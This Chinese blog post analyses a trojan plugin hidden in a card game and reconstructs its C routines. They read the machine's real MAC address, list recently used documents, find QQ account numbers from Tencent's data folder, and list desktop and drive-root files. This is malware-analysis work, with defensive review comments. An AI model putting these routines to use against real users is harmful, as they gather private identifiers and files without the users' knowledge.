收集用户隐私的木马插件分析:第一部分
最近分析一款“特殊”的棋牌游戏,发现其payload是一款收集用户隐私信息的插件,比较好奇该木马收集了哪些用户信息以及具体的实现方式,特此记录。
第一部分主要实现其获取用户MAC地址和一些隐私文档信息的方法,具体如下:
1、获取网卡信息,主要通过GetAdaptersInfo这个API,结合设备控制也可以通过设备路径获取真正的MAC地址:
#include <winsock2.h>
#include <iphlpapi.h>
#include <Shlwapi.h>
#include <stdio.h>
#pragma comment(lib, "IPHLPAPI.lib")
#pragma comment(lib, "shlwapi.lib")
/*
 * get_mac_address - enumerate every network adapter and print, per adapter,
 * the MAC reported by GetAdaptersInfo, a MAC read directly from the adapter
 * device object via DeviceIoControl, and the adapter description.
 *
 * Analyst notes (this is a reconstruction of the plugin's routine, not a
 * clean API sample):
 *  - The device opened is "\\.\<AdapterName>" with GENERIC_READ|GENERIC_WRITE.
 *    Control code 0x170002 with input 0x01010101 appears to be
 *    IOCTL_NDIS_QUERY_GLOBAL_STATS querying OID_802_3_PERMANENT_ADDRESS, with
 *    0x170003 / 0x01010102 (OID_802_3_CURRENT_ADDRESS) as the fallback -
 *    confirm against the NDIS headers. A user-mode process opening adapter
 *    device objects and issuing these IOCTLs is the behaviour worth
 *    watching for in endpoint telemetry.
 *  - No return value; everything is written to stdout with printf.
 *  - Review: hAdap is never compared with INVALID_HANDLE_VALUE before use,
 *    pIPAdapterInfo is never freed, the second malloc is unchecked, and
 *    every wsprintf below passes its own destination buffer as a "%s"
 *    source while appending into a single 512-byte block shared by all
 *    adapters (no bound check).
 */
void get_mac_address()
{
int nIndex = 0;
ULONG uOutBufLen = 0; // size of the buffer holding adapter information
PIP_ADAPTER_INFO pIPAdapterInfo = (PIP_ADAPTER_INFO)malloc(sizeof(IP_ADAPTER_INFO));
if((GetAdaptersInfo(pIPAdapterInfo, &uOutBufLen)) == ERROR_BUFFER_OVERFLOW) // first call only obtains the required uOutBufLen
{
// allocate the buffer size the API asked for
free(pIPAdapterInfo);
pIPAdapterInfo = (PIP_ADAPTER_INFO)malloc(uOutBufLen); // allocate the required memory
}
if((GetAdaptersInfo(pIPAdapterInfo, &uOutBufLen)) == NO_ERROR)// second call fills in the adapter list
{
PIP_ADAPTER_INFO pAdapter = pIPAdapterInfo;
char buffer[512] = {0}; // accumulated output for ALL adapters - never bounds-checked
while(pAdapter)
{
char *pAdapName = pAdapter->AdapterName; // adapter GUID string, reused below as the device path
/*DWORD comboIndex = pAdapter->ComboIndex;
DWORD index = pAdapter->Index;
UINT Type = pAdapter->Type;
bool bDhcpOpen = pAdapter->DhcpEnabled;
char *pAdapIpAddr = pAdapter->IpAddressList.IpAddress.String;
char *pAdapIpMask = pAdapter->IpAddressList.IpMask.String;
char *pAdapGateIpAddr = pAdapter->GatewayList.IpAddress.String;
char *pAdapDhcpIpAddr = pAdapter->DhcpServer.IpAddress.String;*/
char *pAdapDesc = pAdapter->Description;
//MAC address
// format Address[] as "XX-XX-...-XX " (trailing space on the last byte, '-' otherwise)
for (int i=0; i<pAdapter->AddressLength; i++) {
if (i == (pAdapter->AddressLength - 1))
wsprintf(buffer, "%s%.2X ", buffer, (int)pAdapter->Address[i]); // destination also used as source - overlapping arguments
else
wsprintf(buffer, "%s%.2X-", buffer, (int)pAdapter->Address[i]);
}
//real MAC address
// open the adapter's device object directly: "\\.\{adapter GUID}"
char pAdapPath[MAX_PATH] = {0};
wsprintf(pAdapPath, "\\\\.\\%s", pAdapName);
HANDLE hAdap = CreateFileA(pAdapPath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
// NOTE(review): hAdap is not checked for INVALID_HANDLE_VALUE; DeviceIoControl and CloseHandle run regardless
DWORD inBuffer = 0x01010101; // presumably OID_802_3_PERMANENT_ADDRESS - verify
unsigned char outBuffer[0x110] = {0}; // 0x104 bytes of it are offered to the driver; first 6 are used as the MAC
DWORD bytesReturned = 0;
bool bOK = DeviceIoControl(hAdap, 0x170002, &inBuffer, sizeof(DWORD), outBuffer, 0x104, &bytesReturned, NULL);
if (!bOK)
{
// fallback: different control code / OID if the first query is refused
inBuffer = 0x01010102; // presumably OID_802_3_CURRENT_ADDRESS - verify
bOK = DeviceIoControl(hAdap, 0x170003, &inBuffer, sizeof(DWORD), outBuffer, 0x104, &bytesReturned, NULL);
}
CloseHandle(hAdap);
// append the driver-reported MAC and the description; outBuffer is used even when both IOCTLs failed (then it is all zeros)
wsprintf(buffer, "%s %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %s\n", buffer, outBuffer[0], outBuffer[1], outBuffer[2], outBuffer[3], outBuffer[4], outBuffer[5], pAdapDesc);
pAdapter = pAdapter->Next;
}
printf("%s\n", buffer);
}
// NOTE(review): pIPAdapterInfo is leaked on every path
}
2、获取用户的最近文件,通过环境变量获取用户路径或程序数据路径,然后找到最近文件目录遍历其中的文件名:
/*
 * find_the_dirfiles - list every entry matching the search pattern
 * path_dirfile (the callers pass "<dir>\*.lnk" or "<dir>\*") and append
 * "\n<dir><name>" for each one to buf_filenames. "." and ".." are skipped.
 *
 * @param path_dirfile  search pattern handed to FindFirstFileA; the
 *                      directory prefix is everything up to and including
 *                      its last backslash
 * @param buf_filenames caller-owned text buffer that is appended to
 * @return number of entries appended; 0 when the search fails (the error
 *         branch only reads GetLastError and discards it)
 *
 * Review notes: path_dirfile must contain a backslash - a NULL from strrchr
 * would make the memcpy length meaningless; the copy into lpDir is not
 * bounded by sizeof lpDir; hFind is never released with FindClose; the
 * append uses wsprintf with buf_filenames as both destination and "%s"
 * source and has no size limit at all.
 */
int find_the_dirfiles(IN char* path_dirfile, OUT char* buf_filenames)
{
WIN32_FIND_DATAA wFind = {0};
HANDLE hFind = FindFirstFileA(path_dirfile, &wFind);
char lpDir[MAX_PATH] = {0};
;
// directory part of the pattern, including the trailing backslash
memcpy(lpDir, path_dirfile, strrchr(path_dirfile, '\\') - path_dirfile + 1);
int count = 0;
if (hFind != INVALID_HANDLE_VALUE)
{
do
{
char *lpFileName = wFind.cFileName;
if (strcmp(lpFileName, ".") != 0 && strcmp(lpFileName, "..") != 0)
{
// one "\n<dir><name>" line per entry, appended in place
wsprintf(buf_filenames, "%s\n%s%s", buf_filenames, lpDir, lpFileName);
count += 1;
}
;
} while (FindNextFileA(hFind, &wFind));
// NOTE(review): no FindClose(hFind) - the search handle leaks
}
else
{
// error is fetched but not acted on; the self-assignment is a no-op
DWORD dwError = GetLastError();
dwError = dwError;
}
return count;
}
/*
 * get_user_recent_doc - collect the names of the user's recently used
 * documents by listing the .lnk shortcuts in the two "Recent" folders
 * (%USERPROFILE%\Recent and %APPDATA%\Microsoft\Windows\Recent) and print
 * the combined list to stdout.
 *
 * Observable behaviour: two environment-variable reads followed by
 * FindFirstFile/FindNextFile over the Recent folders. The file-name buffer
 * is a 500*MAX_PATH stack array; count_file is assigned but never used,
 * and the path is built with wsprintf using buf_path as its own source.
 */
void get_user_recent_doc()
{
char buf_filenames[500 * MAX_PATH] = {0}; // shared output buffer for both listings
int count_file = 0;
//lately doc
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH); // return value (length / failure) not checked
wsprintf(buf_path, "%s\\Recent\\*.lnk", buf_path); // user's recent-files shortcuts
count_file = find_the_dirfiles(buf_path, buf_filenames);
//lately document name
GetEnvironmentVariableA("APPDATA", buf_path, MAX_PATH); // overwrites buf_path; no failure check
wsprintf(buf_path, "%s\\Microsoft\\Windows\\Recent\\*.lnk", buf_path); // recent files (roaming AppData location)
count_file = find_the_dirfiles(buf_path, buf_filenames); // appends to the same buffer
printf("%s\n", buf_filenames);
}
3、获取用户qq号,通过遍历qq数据目录实现:
/*
 * get_user_qq_num - list the entries of %APPDATA%\Tencent\QQ\Misc and print
 * them. The post states that the names found there identify the QQ
 * accounts used on the machine; the code itself only enumerates the
 * directory with find_the_dirfiles.
 *
 * Same shape as get_user_recent_doc: unchecked GetEnvironmentVariableA,
 * self-referential wsprintf into buf_path, unused count_file.
 */
void get_user_qq_num()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
//qq number
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("APPDATA", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Tencent\\QQ\\Misc\\*", buf_path); // QQ data directory
count_file = find_the_dirfiles(buf_path, buf_filenames);
printf("%s\n", buf_filenames);
}
4、获取用户桌面文件,直接遍历用户桌面目录:
/*
 * get_user_desk_filename - list the files on the user's desktop and print
 * them. Both the English folder name (%USERPROFILE%\Desktop) and the
 * Chinese one (%USERPROFILE%\桌面) are tried, since which one exists
 * depends on the system; both listings land in the same buffer.
 *
 * Same structure and unchecked calls as the other get_user_* routines.
 */
void get_user_desk_filename()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
//desktop file
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Desktop\\*", buf_path); // English folder name, depends on the system
count_file = find_the_dirfiles(buf_path, buf_filenames);
//desktop file
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH); // re-read because wsprintf above overwrote buf_path
wsprintf(buf_path, "%s\\桌面\\*", buf_path); // Chinese folder name, depends on the system
count_file = find_the_dirfiles(buf_path, buf_filenames);
printf("%s\n", buf_filenames);
}
5、遍历磁盘根目录的文件:
/*
 * get_disk_root_filename - list the root directory of every logical drive
 * and print the combined list.
 *
 * GetLogicalDriveStringsA fills buf with consecutive NUL-terminated strings
 * of the form "X:\" (4 bytes each) ending with an extra NUL; the loop walks
 * that array at a fixed stride of 4 and stops at the first empty slot.
 * Review: the API's return value (required length / failure) is ignored,
 * and because the drive string already ends in a backslash the pattern
 * built below is "X:\\*" with a doubled separator (apparently tolerated by
 * FindFirstFileA, as the post reports it working). count_file is unused.
 */
void get_disk_root_filename()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
char buf[0x64] = {0}; // 100-byte drive-string buffer, "C:\<NUL>D:\<NUL>...<NUL>"
GetLogicalDriveStringsA(0x64, buf);
if (buf[0] != 0)
{
for (int i=0; i<0x64; )
{
if (buf[i] == 0)
{
break; // terminating empty string reached
}
char logicDrivePath[0x10] = {0};
memcpy(logicDrivePath, &buf[i], 0x4); // copy "X:\" plus its NUL
if (PathFileExistsA(logicDrivePath)) // skip drives that are not present/ready
{
wsprintf(logicDrivePath, "%s\\*", logicDrivePath); // "X:\" + "\*" -> "X:\\*"
count_file = find_the_dirfiles(logicDrivePath, buf_filenames);
}
i = i + 4; // next "X:\<NUL>" entry
}
}
printf("%s\n", buf_filenames);
}
这部分比较简单,也没啥好总结的,主要就是对特定目录的文件遍历及如何获取网卡信息。